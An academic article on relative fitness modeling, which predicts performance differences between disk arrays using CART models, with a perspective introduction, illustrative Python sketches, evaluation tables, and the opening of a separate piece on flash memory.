To address this problem, Michael Mesnier, Matthew Wachs, Raja Sambasivan, Alice Zheng, and Gregory Ganger have proposed a new approach, called relative fitness modeling. Rather than directly building a performance model for each disk array, the authors suggest it is easier to characterize the difference in performance between disk arrays. These models, built by measuring the differences in performance between a given pair of arrays for a representative set of workloads, are shown empirically to apply to a larger set of workloads. Then, if we have a relative fitness model for the differences between two arrays, and we know how a given workload performs on the first array, we can predict the performance of the workload on the second. This scenario is common. For example, a user may have measured the average I/O response time of an application on an existing array; if the disk array vendor can provide a relative fitness model of the differences between the user’s existing disk array and a newer one, the I/O response time of the application on the new array can be predicted.
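The management question posed earlier, “How will my applications’ storage performance change if I take this option?”, can be sketched as code. The sketch asks a model for a prediction under each candidate placement and picks the best option that meets a response-time target. The model here is a deliberately crude M/M/1-style queueing estimate (response time = service time / (1 − utilization)). It is an assumption standing in for exactly the kind of accurate disk-array model the perspective says is hard to build, and it ignores caching, RAID layout, and workload mix. `Array` and its fields are hypothetical.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class Array:
    """A candidate disk array (hypothetical attributes for illustration)."""
    name: str
    service_time_ms: float  # assumed mean per-I/O service time
    current_iops: float     # load already placed on this array

def predicted_response_ms(array: Array, extra_iops: float) -> float:
    """Toy M/M/1-style estimate, not a real disk-array model:
    response time = service time / (1 - utilization), unbounded once saturated."""
    utilization = (array.current_iops + extra_iops) * array.service_time_ms / 1000.0
    if utilization >= 1.0:
        return float("inf")
    return array.service_time_ms / (1.0 - utilization)

def choose_array(arrays: list[Array], workload_iops: float, target_ms: float) -> Optional[str]:
    """Ask the model 'what if the new workload goes here?' for every option and
    return the feasible array with the lowest predicted response time, if any."""
    options = [(predicted_response_ms(a, workload_iops), a.name) for a in arrays]
    feasible = [opt for opt in options if opt[0] <= target_ms]
    return min(feasible)[1] if feasible else None
```

With an existing array at 8 ms per I/O already serving 100 IOPS and a newer one at 5 ms serving 50 IOPS, adding a 20-IOPS workload gives predictions of about 200 ms and 7.7 ms. `choose_array` therefore picks the newer array against a 10 ms target. Swapping in a better predictor, such as a relative fitness model, leaves the decision logic unchanged.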

The relative fitness method is an important step in modeling the performance of disk arrays, but many challenges persist. In particular, disk array models must be able to predict accurately the performance of an arbitrary combination of workloads, given the increasing trend of storage consolidation in the data center (that is, storing multiple application data sets on the same disk array), and this problem remains open. The success of the relative fitness method gives us hope that similar techniques can be used to predict the performance of workload combinations; this is an active area of work for storage systems researchers.
Relative Fitness Modeling


By Michael P. Mesnier, Matthew Wachs, Raja R. Sambasivan, Alice X. Zheng, and Gregory R. Ganger 


Abstract 
Relative fitness is a new approach to modeling the performance of storage devices (e.g., disks and RAID arrays). In contrast to a conventional model, which predicts the performance of an application’s I/O on a given device, a relative fitness model predicts performance differences between devices. The result is significantly more accurate predictions.


1. INTRODUCTION


Relative fitness: the fitness of a genotype compared with 
another in the same gene system. 


Managing storage within a data center can be surprisingly 
complex and costly. Large data centers have numerous stor- 
age devices of varying capability, and one must decide which 
application data sets (e.g., database tables, web server con- 
tent) to store on which devices. Sadly, the state-of-the-art 
in Information Technology (IT) requires much of this to be 
done manually. At best, this results in an overworked system 
administrator. However, it can also lead to suboptimal per- 
formance and wasted resources. 

Many researchers believe that automated storage man- 
agement”’ is one way to offer some relief to administrators. 
In particular, application workloads can be automatically 
assigned to storage devices. Doing so requires accurate predictions as to how a workload will perform on a given device,
and a model of a storage device can be used to make these 
predictions. Specifically, one trains a model to predict the 
performance of a device as a function of the I/O characteris- 
tics of a given workload.'\”''* Common I/O characteristics 
include an application’s read/write ratio, I/O pattern (ran- 
dom or sequential), and I/O request size. 

Though it sounds simple, such modeling has not been 
realized in practice, primarily because of the difficulty of 
obtaining workload characteristics that are good predic- 
tors of performance, yet also suitable for use in a model. 
For example, the I/O request size of an application is often 
approximated with an average, as opposed to the actual dis- 
tribution (e.g., bimodal). Although such approximations 
reduce modeling complexity, they can lead to inaccurate 
predictions. 
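A minimal sketch of how averaging can mislead, using a hypothetical device whose constants are all invented. Requests of 64 KB or less take a fast path, and larger ones pay a positioning cost plus transfer time. A bimodal workload of 4 KB and 256 KB requests has a mean size of 130 KB, a size no request actually has. A model fed only that mean therefore predicts the cost of a request that never occurs.

```python
from statistics import mean

def service_time_ms(size_kb: float) -> float:
    """Hypothetical device: small requests take a fast path, large ones pay a
    positioning cost plus transfer time. All constants are invented."""
    if size_kb <= 64:
        return 0.1 + size_kb / 500.0   # assumed fast path
    return 5.0 + size_kb / 100.0       # assumed positioning + transfer

def mean_time_from_distribution(sizes_kb: list[float]) -> float:
    # Prediction that uses the actual request-size distribution.
    return mean(service_time_ms(s) for s in sizes_kb)

def mean_time_from_average(sizes_kb: list[float]) -> float:
    # Prediction that uses only the average request size, as a simplified model would.
    return service_time_ms(mean(sizes_kb))
```

For 50 requests of 4 KB and 50 of 256 KB, the distribution-based prediction is about 3.83 ms per request. The average-based prediction is 6.3 ms, an overestimate of roughly 64%, because the nonlinearity at 64 KB is invisible once the distribution is collapsed to its mean.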

This article describes a new modeling approach called 
relative fitness modeling. '° A relative fitness model uses obser- 
vations (performance and resource utilization) from one stor- 
age device to predict the performance of another, thereby 
reducing the dependence on workload characteristics. Figure 1 
illustrates relative fitness modeling for two hypothetical devices A and B.

The insight behind relative fitness modeling is best obtained through analogy. When predicting your grade in a college course (a useful prediction during enrollment), it is helpful to know the grade received by a peer (his performance) and the number of hours he worked each week to achieve that grade (his resource utilization). Naturally, our own performance for a certain task is a complex function of the characteristics of the task and our ability. However, we have learned to make predictions relative to the experiences of others with similar abilities, because it is easier.


Applying the analogy, two storage devices may behave similarly enough to be reasonable predictors for each other. For example, they may have similar RAID levels, caching algorithms, or hardware platforms. As such, their performance may be related. Even dissimilar devices may be related in some ways (e.g., for a given workload type, one usually performs well and the other poorly). The objective of relative fitness modeling is to learn such relationships.


2. BACKGROUND 

Storage performance modeling is a heavily researched area, including analytical models, statistical or probabilistic models, and machine learning models. Models are either white-box or black-box. White-box models use knowledge of the internals of a storage device (e.g., drives, controllers, and caches), and black-box models do not. Given the complexity of modern-day storage devices, black-box approaches are becoming increasingly attractive.


Figure 1: Using sample workloads, a model learns to predict how the 
performance of a workload changes between two devices (A and B). 

To predict the performance of a new workload on B, the workload characteristics, performance, and resource utilization (as measured on device A) are input into the model of B. The prediction is a performance scaling factor, which we refer to as B's "relative fitness."


[Figure 1 diagram. Step 1: Model differences between devices A and B (training data → model learning algorithm → relative fitness model of B). Step 2: Use model to predict the performance of B (A's workload characteristics, A's performance, and A's resource utilization → relative fitness model of B → B's relative fitness).]


A previous version of this research paper was published in 
the Proceedings of the International Conference on Measure- 
ment and Modeling of Computer Systems (San Diego, CA, 
June 2007), ACM, NY. 
Perhaps the simplest of all black-box models is a numeric average. For example, the fuel efficiency of a car (average miles per gallon) and a soccer player's performance (average goals per game) are both black-box models. Of course, such models can be easily extended with workload characteristics (e.g., highway or city, home game or away), and an average can be maintained for each type of workload.

Table 1 shows a simple black-box model of a storage device (a table of performance averages), and Figure 2 shows the same information in a regression tree. Both models are indexed using one workload characteristic (the average request size of the I/O that is issued to the storage device by the application), and both models must be trained with sample workloads in order to learn performance averages for various request sizes. Some form of interpolation is required when an exact match is not found in the model. For example, to predict the performance of a workload with 3KB requests using Table 1, one might average the 2KB and 4KB performance and predict 37MB/s. Of course, storage researchers have explored a number of workload characteristics in addition to request size, including the read/write ratio, multiprogramming level (queue depth), I/O inter-arrival delay, and spatial locality. More complex characteristics (e.g., I/O burstiness, spatio-temporal correlation) have also been investigated.

More formally, a model of a storage device i (white-box or black-box) can be expressed as a function F_i. During training, the inputs are the workload characteristics WC_i of an application running on device i, and the output is a performance metric P_i (bandwidth, throughput, or latency):

$$P_i = F_i(WC_i) \tag{1}$$

Table 1: A table-based model that records the performance of a disk drive for sequentially read data.

Request size    Bandwidth
1KB             15MB/s
2KB             27MB/s
4KB             47MB/s
8KB             66MB/s

Figure 2: A regression tree that learns the performance of a disk drive for sequentially read data. [Tree nodes split on request size.]
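The table-based model can be sketched in a few lines of Python as an absolute model F_i in the sense of Equation 1. This is a minimal illustration, assuming linear interpolation between neighboring rows and clamping outside the measured range; the article only says that some form of interpolation is required. `predict_bandwidth` is a hypothetical name. For a 3KB request, linear interpolation reduces to averaging the 2KB and 4KB rows, which reproduces the 37MB/s estimate.

```python
# Table 1: request size (KB) -> sequential-read bandwidth (MB/s).
TABLE_1 = {1: 15.0, 2: 27.0, 4: 47.0, 8: 66.0}


def predict_bandwidth(request_kb: float) -> float:
    """Absolute model F_i: look up Table 1, interpolating linearly between rows.

    Assumption: requests outside the measured range are clamped to the
    nearest row rather than extrapolated.
    """
    sizes = sorted(TABLE_1)
    if request_kb <= sizes[0]:
        return TABLE_1[sizes[0]]
    if request_kb >= sizes[-1]:
        return TABLE_1[sizes[-1]]
    for lo, hi in zip(sizes, sizes[1:]):
        if lo <= request_kb <= hi:
            frac = (request_kb - lo) / (hi - lo)
            return TABLE_1[lo] + frac * (TABLE_1[hi] - TABLE_1[lo])
    raise AssertionError("unreachable: request_kb lies within the table range")


print(predict_bandwidth(3))  # 37.0, the midpoint of the 2KB and 4KB rows
```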


We refer to Equation 1 as an absolute model, to signify that the inputs WC_i are absolute, and not relative to some other device. However, in practice, one does not possess WC_i, as this would require running the workload on device i in order to obtain them. Because running the workload to obtain WC_i obviates the need for predicting the performance of device i, one instead uses the characteristics WC_j obtained from some other storage device j. That is, the model assumes that the characteristics of a workload are static and will not differ across storage devices. More precisely, the model assumes that WC_i and WC_j are equivalent. However, this is not always a safe assumption.


2.1. The challenges with absolute models 

The primary challenges with absolute models relate to workload characterization, which has been an open problem for decades. First, one must discover the performance-affecting characteristics of a workload. This can be challenging given the heterogeneity of storage devices. For example, a storage array with a large cache may be less sensitive to the spatial access pattern than an array with little cache, so models of the devices would likely focus on different workload characteristics when predicting performance.

Second, one must manage the trade-off between expressiveness and conciseness. Most models expect numbers as input, and it can be challenging to describe complex workloads with just a few numbers. In effect, workload characterization compresses the I/O stream to just a few distinguishing features. The challenge is to compress the stream without losing too much information.

Third, and more fundamentally, an absolute model does not capture the connection between a workload and the storage device on which it executes. While the assumption of static workload characteristics (i.e., WC_i = WC_j) is safe for open workloads, where the workload characteristics are independent of the I/O service time, it is not safe for closed workloads. The most obvious change for a closed workload is the I/O arrival rate: if a storage device completes the I/O faster, then an application is likely to issue I/O faster. Other characteristics can change as well, such as the average request size, access pattern, read/write ratio, and queue depth. Such effects occur when file systems, page caches, and other OS middleware reside between an application and the storage device. Although the application may issue the same I/O, the characteristics of the I/O as seen by the storage device could change due to write reordering, aggregation and coalescing, caching, prefetching, and other interactions between an operating system and a storage device. For example, a slower device can result in a workload with larger inter-arrival times and larger write requests (due to request coalescing) when compared to a faster device.
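The difference between open and closed workloads can be illustrated with a toy Python model. It assumes a single closed-loop stream that issues its next I/O only after the previous one completes and a fixed think time elapses; the function names and the service and think times are hypothetical. Under these assumptions, the arrival rate a device sees depends on the device's own service time for the closed workload but not for the open one, which is one way WC_i and WC_j can come to differ.

```python
def closed_arrival_rate(service_ms: float, think_ms: float) -> float:
    """I/Os per second from one closed-loop stream: the next request is issued
    only after the previous one completes and a fixed think time elapses."""
    return 1000.0 / (service_ms + think_ms)


def open_arrival_rate(rate_per_s: float, service_ms: float) -> float:
    """An open workload issues I/O at a fixed rate; service_ms is accepted
    only to make explicit that it has no effect."""
    return rate_per_s


for name, service_ms in (("faster device", 2.0), ("slower device", 8.0)):
    print(name,
          closed_arrival_rate(service_ms, think_ms=2.0),
          open_arrival_rate(100.0, service_ms))
# faster device 250.0 100.0
# slower device 100.0 100.0
```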
Collectively, these challenges motivate the work presented in this article. Rather than attempt to solve the difficult problem of identifying workload characteristics that are expressive, yet concise and static across devices, we choose to use performance and resource utilization. That is, we use the performance and utilization of device j to predict the performance of a different device i. Of course, such relative models must be built between each pair of devices, as performance and resource utilization are device-specific.


3. RELATIVE FITNESS MODELING

Relative fitness begins with an absolute model (Equation 1). Recall that a workload is running on device j, WC_j can be measured on device j, and we want to predict the performance of moving the workload to a different device i. The first objective of relative fitness is to capture the changes in workload characteristics from device j to i, that is, to predict WC_i given WC_j. Such change is dependent on the devices, so we define a function G_{j→i} that predicts the workload characteristics of device i given j:

$$WC_i = G_{j \to i}(WC_j)$$

We can now apply G in the context of an absolute model F_i:

$$P_i = F_i\left(G_{j \to i}(WC_j)\right)$$


However, rather than learn two functions, the composition of F and G can be expressed as a single composite function RM_{j→i}, which we call a relative model:

$$P_i = RM_{j \to i}(WC_j) \tag{2}$$

With each model now involving an origin j and target i, we can use the performance of device j (Perf_j) and its resource utilization (Util_j) to help predict the performance of device i. Perf_j is a vector of performance metrics such as bandwidth, throughput, and latency. Util_j is a vector of values such as the device's cache utilization, the hit/miss ratio, its network bandwidth, and its CPU utilization:

$$P_i = RM_{j \to i}(WC_j, Perf_j, Util_j) \tag{3}$$

In other words, one can now describe a workload relative to some other device. Recalling the analogy, if you want to predict your grade in a course that a colleague has already taken, you could simply have the colleague tell you his grade and the number of hours he worked each week. Other details of the course (workload characteristics) could be useful, but this information may not be as critical.

Next, rather than predicting the performance P_i directly, one can predict the performance ratio P_i/P_j, which may be a simpler function to model (e.g., perhaps device i is twice as fast as device j). We call such a model a relative fitness model:

$$\frac{P_i}{P_j} = RF_{j \to i}(WC_j, Perf_j, Util_j) \tag{4}$$

To use the relative fitness model, one solves for P_i:

$$P_i = RF_{j \to i}(WC_j, Perf_j, Util_j) \times P_j$$

3.1. Model training

Training a relative fitness model requires workload samples from two devices i and j. Each workload sample can be described with three vectors: workload characteristics (WC), performance (Perf), and resource utilization (Util). During training, the goal is to learn relationships between the predictor variables (WC_j, Perf_j, and Util_j) and the predicted relative fitness value P_i/P_j (for some P in Perf).

Table 2(c) shows the format of the training data for a relative fitness model. For comparison, Table 2(b) shows that of a relative model, which trains to predict performance (not a ratio), and Table 2(a) shows that of an absolute model, which only requires samples from one storage device.

Given sufficient training data, one can construct a relative fitness model using a variety of learning algorithms. The problem falls under the general scope of supervised learning, where one has access to a set of predictor variables (WC, Perf, and Util), as well as the desired response (the relative fitness value). It is as though an oracle (or supervisor) gives the true output value for each sample, and the algorithms need only learn the mapping between input and output.

The domain of supervised learning problems can be further subdivided into classification (discrete-valued predictions) and regression (continuous-valued predictions). Relative fitness values are continuous, and there are many regression models in the statistical literature. We choose to use classification and regression tree (CART) models, for their simplicity, flexibility, and interpretability.

3.2. Summary and modeling cost

Whereas conventional absolute modeling constructs one model per device and assumes that the workload characteristics are static across devices, relative fitness modeling constructs two models for each pair of devices (j→i and i→j) and implicitly models the changing workload characteristics. In addition, the relative approaches use performance and resource utilization when making predictions, thereby relaxing the dependency on expressive workload characteristics. Of course, the cost of the relative approach is the additional model construction: O(n²) versus O(1), where n is the number of storage devices. However, in our evaluation, model construction takes at most a few seconds. Moreover, models can be built and maintained by each storage device. That is, each device can construct O(1) models that predict its fitness relative to all other devices. As such, the computational resources for maintaining the models can be made to scale with the number of devices. Also, in large-scale environments, certain collections of devices will be identical and can share models.

Table 2: Training data formats for the various models. The last column in each table is the variable that we train a model to predict. All other columns are predictor variables.

(a) Absolute model
Sample   Predictor variables                   Predicted variable
1        WC_{i,1}                              P_{i,1}
2        WC_{i,2}                              P_{i,2}
...
N        WC_{i,N}                              P_{i,N}

(b) Relative model
Sample   Predictor variables                   Predicted variable
1        WC_{j,1}, Perf_{j,1}, Util_{j,1}      P_{i,1}
2        WC_{j,2}, Perf_{j,2}, Util_{j,2}      P_{i,2}
...
N        WC_{j,N}, Perf_{j,N}, Util_{j,N}      P_{i,N}

(c) Relative fitness model
Sample   Predictor variables                   Predicted variable
1        WC_{j,1}, Perf_{j,1}, Util_{j,1}      P_{i,1}/P_{j,1}
2        WC_{j,2}, Perf_{j,2}, Util_{j,2}      P_{i,2}/P_{j,2}
...
N        WC_{j,N}, Perf_{j,N}, Util_{j,N}      P_{i,N}/P_{j,N}
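The training and prediction steps of Section 3 can be sketched end to end in Python. This is a minimal illustration under stated assumptions, not the authors' implementation. The tree is a bare-bones CART-style regression tree (splits chosen to minimize the sum of squared errors, no pruning). The training samples, and the rule that device i is 1.5 times as fast as j for requests of 32KB or more and 0.8 times as fast otherwise, are invented. Util_j is omitted, as it is in the evaluation. Each sample's predictors come only from device j (request size and write fraction as WC_j, bandwidth as Perf_j), the response is P_i/P_j, and the prediction is turned back into P_i with Equation 4.

```python
def mean(ys):
    return sum(ys) / len(ys)


def sse(ys):
    """Sum of squared errors around the mean (the CART regression split criterion)."""
    m = mean(ys)
    return sum((y - m) ** 2 for y in ys)


def build_tree(X, y, depth=0, max_depth=3, min_leaf=2):
    """Grow a small CART-style regression tree. A leaf is a float (mean response);
    an internal node is a tuple (feature, threshold, left, right)."""
    best = None
    if depth < max_depth and len(y) >= 2 * min_leaf:
        for f in range(len(X[0])):
            for t in sorted({row[f] for row in X}):
                left = [k for k, row in enumerate(X) if row[f] <= t]
                right = [k for k, row in enumerate(X) if row[f] > t]
                if len(left) < min_leaf or len(right) < min_leaf:
                    continue
                cost = sse([y[k] for k in left]) + sse([y[k] for k in right])
                if best is None or cost < best[0]:
                    best = (cost, f, t, left, right)
    # Stop when no split reduces error (the tolerance absorbs float round-off).
    if best is None or best[0] >= sse(y) - 1e-12:
        return mean(y)
    _, f, t, left, right = best

    def grow(idx):
        return build_tree([X[k] for k in idx], [y[k] for k in idx],
                          depth + 1, max_depth, min_leaf)

    return (f, t, grow(left), grow(right))


def predict(tree, x):
    """Follow the tree from the root to a leaf."""
    while isinstance(tree, tuple):
        f, t, left, right = tree
        tree = left if x[f] <= t else right
    return tree


# Hypothetical training samples. Predictors come only from origin device j:
# (request size KB, write fraction, bandwidth on j in MB/s).
# Response: relative fitness P_i / P_j (made-up rule, see lead-in).
X, y = [], []
for kb in (4, 8, 16, 32, 64, 128):
    for write_fraction in (0.0, 0.5, 1.0):
        bw_j = 10.0 + kb / 2  # made-up bandwidth observed on device j
        X.append((kb, write_fraction, bw_j))
        y.append(1.5 if kb >= 32 else 0.8)

rf_tree = build_tree(X, y)

# A new workload observed on j; solve Equation 4 for P_i = RF * P_j.
observed_on_j = (48, 0.25, 34.0)
rf = predict(rf_tree, observed_on_j)
p_i = rf * observed_on_j[2]
print(round(rf, 2), round(p_i, 1))  # 1.5 51.0
```

A production setup would more likely use an existing CART implementation with pruning and evaluate it on held-out samples, as the evaluation below does with a 75/25 split.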


4. EVALUATION 
The motivation and advantages of relative fitness modeling 
can be stated as four hypotheses: 


Hypothesis 1. Workload characteristics can change across storage devices (WC_i ≠ WC_j) and reduce the accuracy of an absolute model.

Hypothesis 2. A relative model (Equation 2) can reduce the 
inaccuracies that result from changing characteristics. 

Hypothesis 3. Performance and resource utilization can 
improve prediction accuracy (Equation 3). 

Hypothesis 4. Performance ratios (Equation 4) can pro- 
vide better accuracy than raw performance values 
(Equation 3). 


To test these hypotheses, the accuracy of various CART 
models can be compared: absolute models (Equation 1), rel- 
ative models (Equation 2), relative models with performance 
(Equation 3), and relative fitness models (Equation 4). 


4.1. Setup 

Experiments are run on an IBM x345 server (dual 2.66GHz Xeon, 1.5GB RAM, GbE, Linux 2.6.12) attached to three iSCSI storage arrays. The arrays have different hardware platforms and software stacks, and are configured with different RAID levels.* More specifically,


Vendor A is a 14-disk RAID-50 array with 1GB of cache 
(400GB 7200 RPM Hitachi Deskstar SATA) 

Vendor B is a 6-disk RAID-0 array with 512MB of cache 
(250GB 7200 RPM Seagate Barracuda SATA) 

Vendor C is an 8-disk RAID-10 array with 512MB of cache 
(250GB 7200 RPM Seagate Barracuda SATA) 


The server attaches to each array using an iSCSI device driver that contains counters (below the file system and page cache) for characterizing workloads and measuring their performance. A synthetic workload generator is used to generate numerous workload samples, which we refer to as a fitness test. These samples are used to train and test the CART models. Similar results from other workloads (e.g., Postmark, TPC-C), as well as details on the CART algorithm (e.g., tree construction and pruning), can be found in our conference paper.


4.2. Fitness test results 

The fitness test compares the performance of the storage arrays across a wide range of workloads (various runs of the workload generator). The measured workload characteristics (WC) of each sample include the write percent, the write and read request sizes, the write and read randomness (average seek distance, in blocks, per I/O), and the queue depth (average number of outstanding I/Os). The performance (Perf) of each sample run is the average bandwidth (MB/s), throughput (IO/s), and latency (ms). Resource utilization (Util) is not used in this evaluation, as this requires modifying storage device software to which we did not have access. A total of 3000 samples are generated.

* RAID level 0 is striping, 1 is mirroring, 5 is striping with parity, 10 is striping over mirrored pairs (4 in this case), and 50 is striping over RAID-5 parity arrays (2 in this case).

Over all 3000 samples, Vendor A is the fastest array, with an average bandwidth of 25 MB/s, an average throughput of 624 IO/s, and an average latency of 37ms. Vendor B is the second fastest (17 MB/s, 349 IO/s, and 45ms). Vendor C is the third (14 MB/s, 341 IO/s, and 84ms). Although Vendor A is the fastest on average, it is not necessarily the fastest for all sample workloads in the fitness test. There are samples where Vendors B and C do better than A (relative fitness values greater than 1) and cases where they do worse (values less than 1). In short, the relative fitness of a device can vary with the workload characteristics.

As an example of how devices can behave similarly, Figure 3 illustrates how the sequential write bandwidth for each array varies for different request sizes and queue depths. From the 3000 samples, we show only the sequential write workloads. There are 120 such samples, sorted by the performance of Vendor A. The graph illustrates the similar performance of the arrays. In particular, the prominent discontinuity in the graph is shared by all arrays (a drop in performance when there are only one or two outstanding requests). Also note how Vendor B is faster than Vendor C to the left of the discontinuity, but slower to the right. Such piecewise functions are ideally suited for CART models.

In support of Hypothesis 1, Table 3 contains the workload characteristics averaged over all samples, as measured on each array. Note the variance across devices (WC_i ≠ WC_j), most notably the average spatial randomness of writes, which varies by as much as 38%. In particular, Vendor A experiences the most randomness (an average seek distance of 321MB per write), Vendor B the second most (250MB), and Vendor C the third (233MB). Although masked by the averages in Table 3, the request sizes and queue depths also vary across storage devices for some of the sample workloads.

Figure 3: Device similarity. The performance of each array changes similarly, indicating that the performance of one array is a good predictor of another.
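The "as much as 38%" figure can be checked against Table 3, assuming the maximum difference is the spread across arrays (largest minus smallest) as a percentage of the smallest value; that definition is our reading and is not stated in the text. Because the averages in Table 3 are rounded, recomputed spreads can differ from the table in the last digit.

```python
# Per-array averages from Table 3 (arrays A, B, C).
TABLE_3 = {
    "Read size (KB)": (40, 41, 41),
    "Write seek (MB)": (321, 250, 233),
    "Queue depth": (23, 22, 21),
}


def max_difference_pct(values):
    """Largest minus smallest value, as a percentage of the smallest (assumed definition)."""
    return (max(values) - min(values)) / min(values) * 100


for name, values in TABLE_3.items():
    print(f"{name}: {max_difference_pct(values):.1f}%")
# Read size (KB): 2.5%
# Write seek (MB): 37.8%
# Queue depth: 9.5%
```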


4.3. Interpreting the models 
Of the fitness test samples, 75% are used to build the CART models and 25% are reserved for testing. Figure 4 illustrates four of the bandwidth models, one of each modeling type. For readability, each tree is pruned to a depth of 4, resulting in at most 8 leaves (prediction rules).

The models in Figure 4 predict the performance of Vendor 
C given observations from Vendor A. CART builds trees top- 
down, so nodes near the top of the tree have the most informa- 
tion. In particular, note how the relative and relative fitness 
models learn that the bandwidth of Vendor A is the best pre- 
dictor of the bandwidth of Vendor C. 

As an example of how to use the trees to make a prediction, suppose a workload is running on Vendor A and we want to predict its performance on Vendor C. Also suppose that the workload, as measured by Vendor A, has an average read seek of 2048 blocks, a request size of 64KB, a write percentage below 0.5%, a bandwidth of 83 MB/s, and a throughput of 1328 IO/s. The absolute model predicts 75.0 MB/s (see the highlighted path in Figure 4a), the relative model (Figure 4b) predicts 75 MB/s, the relative model trained with performance (Figure 4c) predicts 65.0 MB/s, and the relative fitness model (Figure 4d) predicts that Vendor C is 63% of Vendor A, or 51 MB/s.


4.4. Modeling accuracy 

Recall that 25% of the fitness test samples are reserved for 
testing, so the performance of each sample is known and can 
be used to determine the relative error of each prediction. 


Table 3: Fitness test workload characteristics.

WC                 Array A   Array B       Array C   Maximum difference (%)
Write percent      40        39            38        5.2
Write size (KB)    61        61            61        0
Read size (KB)     40        41            41        2.5
Write seek (MB)    321       250           233       38
Read seek (MB)     710       [illegible]   711       0
Queue depth        23        22            21        9.5


For example, if the performance of Vendor C (for a given test sample) is 45MB/s and the prediction is 51MB/s, the relative error is $|51 - 45| / 45 \times 100$, or 13.3%. To quantify the average error of each model (over all test samples), we report the average relative error of the predictions.
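The error metric is simple enough to state as code. A minimal Python sketch, with hypothetical function names, assuming the relative error is taken with respect to the measured value, as in the 45MB/s example:

```python
def relative_error_pct(predicted: float, actual: float) -> float:
    """Relative error of one prediction, as a percentage of the measured value."""
    return abs(predicted - actual) / actual * 100


def average_relative_error_pct(pairs) -> float:
    """Mean relative error over (predicted, actual) pairs, e.g., all test samples."""
    errors = [relative_error_pct(p, a) for p, a in pairs]
    return sum(errors) / len(errors)


print(round(relative_error_pct(51, 45), 1))  # 13.3
```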

As a baseline, Table 4 contains the average relative error of the bandwidth, throughput, and latency predictions for the absolute model. The table is organized pairwise. Workload characteristics (WC) are obtained from one array and predictions (P_i) are made for another. For example, the average relative error of the bandwidth predictions when characterizing on Vendor A and predicting for Vendor C is 22% (the top right cell in Table 4).

The first observation is that the most accurate predictions occur when the workload is characterized on the same device for which the prediction is being made (WC_i = WC_j), as the diagonal entries show. However, if one runs a workload on device i to obtain WC_i, there is no need to make a prediction. These predictions are only included to illustrate how changing workload characteristics (WC_i ≠ WC_j) can affect prediction accuracy. For example, the bandwidth prediction error for Vendor A increases from 23% (when characterized on Vendor A) to 29% (when characterized on Vendor B) and 30% (when characterized on Vendor C). Therefore, Table 4 supports Hypothesis 1: changing workload characteristics can affect prediction accuracy.

Figure 5, in contrast, shows the prediction errors for the relative model (Equation 3) and relative fitness model (Equation 4), both of which use performance information to make a prediction; the absolute model prediction errors from Table 4 are shown for comparison. Overall, the relative fitness models reduce the average bandwidth prediction error from 25% to 17%, throughput from 24% to 19%, and latency from 40% to 29%. Moreover, in most cases, the relative fitness model is slightly more accurate than the relative model. These results confirm that models trained with performance can be more accurate (Hypotheses 2 and 3) and that predicting ratios can further improve accuracy (Hypothesis 4).

Table 4: Prediction error for the absolute model. Workload characteristics (WC) are obtained from array j and predictions (P_i) are made for array i.

Predicted array (i):      A     B     C
Bandwidth (%)
  WC from array A         23    25    22
  WC from array B         29    19    21
  WC from array C         30    25    17
Throughput (%)
  WC from array A         20    23    22
  WC from array B         28    15    21
  WC from array C         26    21    14
Latency (%)
  WC from array A         20    39    59
  WC from array B         31    21    52
  WC from array C         26    30    21

Figure 4: CART models trained to predict the bandwidth of Vendor C. The leaf nodes in the absolute and relative models represent bandwidth predictions; the leaves in the relative fitness model are relative fitness predictions. The absolute model (a) and relative model (b) only use workload characteristics from Vendor A; the relative model with performance (c) and relative fitness model (d) also use Vendor A's performance (shaded). All but the absolute model account for changes in the workload characteristics between Vendors A and C.

Figure 5: Errors of the absolute (first bar in each graph), relative (second), and relative fitness models (third), where i←j indicates that workload characteristics from array j are used to predict the performance of array i. (x-axis: array pair.)
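The baseline averages quoted above (25%, 24%, and 40%) are consistent with averaging the six off-diagonal cells of Table 4, that is, only the predictions made for a different array than the one the workload was characterized on. That reading is our assumption; the short Python check below shows the arithmetic.

```python
# Table 4: rows = array j whose WC are used (A, B, C),
# columns = array i being predicted (A, B, C).
TABLE_4 = {
    "bandwidth":  [[23, 25, 22], [29, 19, 21], [30, 25, 17]],
    "throughput": [[20, 23, 22], [28, 15, 21], [26, 21, 14]],
    "latency":    [[20, 39, 59], [31, 21, 52], [26, 30, 21]],
}


def cross_device_mean(matrix):
    """Mean error over off-diagonal cells (predictions for a different array)."""
    off = [matrix[j][i] for j in range(3) for i in range(3) if i != j]
    return sum(off) / len(off)


for metric, matrix in TABLE_4.items():
    print(metric, round(cross_device_mean(matrix), 1))
# bandwidth 25.3
# throughput 23.5
# latency 39.5
```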

In summary, workload characteristics can change 
across devices and impact the accuracy of an absolute 
model (Hypothesis 1), a relative model can reduce the 
inaccuracy due to changing workloads (Hypothesis 2), 
the performance of one device can be used to predict the 
performance of another (Hypothesis 3), and performance 
ratios can be better predictors than raw performance val- 
ues (Hypothesis 4). 


5. CONCLUSION 

By modeling storage devices relative to one another, relative fitness models can use the observed performance and resource utilization of a workload on one device when making predictions for another. Such modeling addresses many of the challenges associated with workload characterization and, therefore, brings automated storage management a step closer to becoming a practical solution for the data center.

In addition, relative fitness models may find a broader 
applicability outside of storage management. In the same 
manner that storage models can exploit performance and 
resource utilization, so too can models of other data center 
resources (e.g., application servers). 
Integrating Flash Devices


By Goetz Graefe 


Flash memory nowadays seems to be in every discussion about system architecture, not only in mobile devices from phones to notebook computers, but also in servers, from Web servers to blades and database systems. Sure enough, flash memory boasts multiple qualities and advantages over traditional mass storage, disk drives with rotating platters and moving access arms. These include no noise or vibration, lower power consumption and cooling requirements during both active and idle times, faster access times, and lower cost when calculated with a focus on access performance rather than on capacity. For example, a "flash disk" device providing a standard interface and form factor of traditional SATA disk may cost five times more than a traditional SATA disk, but if it permits 100 times more read operations per second, the cost for access performance is 20 times less. Similarly, flash memory devices offer tremendous advantages over traditional disk drives in terms of power and energy relative to access performance.
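The cost argument for flash is a ratio of ratios. A minimal Python sketch using the figures from the paragraph above (a flash device costing 5 times as much and delivering 100 times the read operations per second); the function name is hypothetical:

```python
def access_cost_advantage(price_ratio: float, ops_ratio: float) -> float:
    """How many times cheaper flash is per unit of access performance, given the
    flash/disk price ratio and the flash/disk operations-per-second ratio."""
    return ops_ratio / price_ratio


print(access_cost_advantage(price_ratio=5, ops_ratio=100))  # 20.0
```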
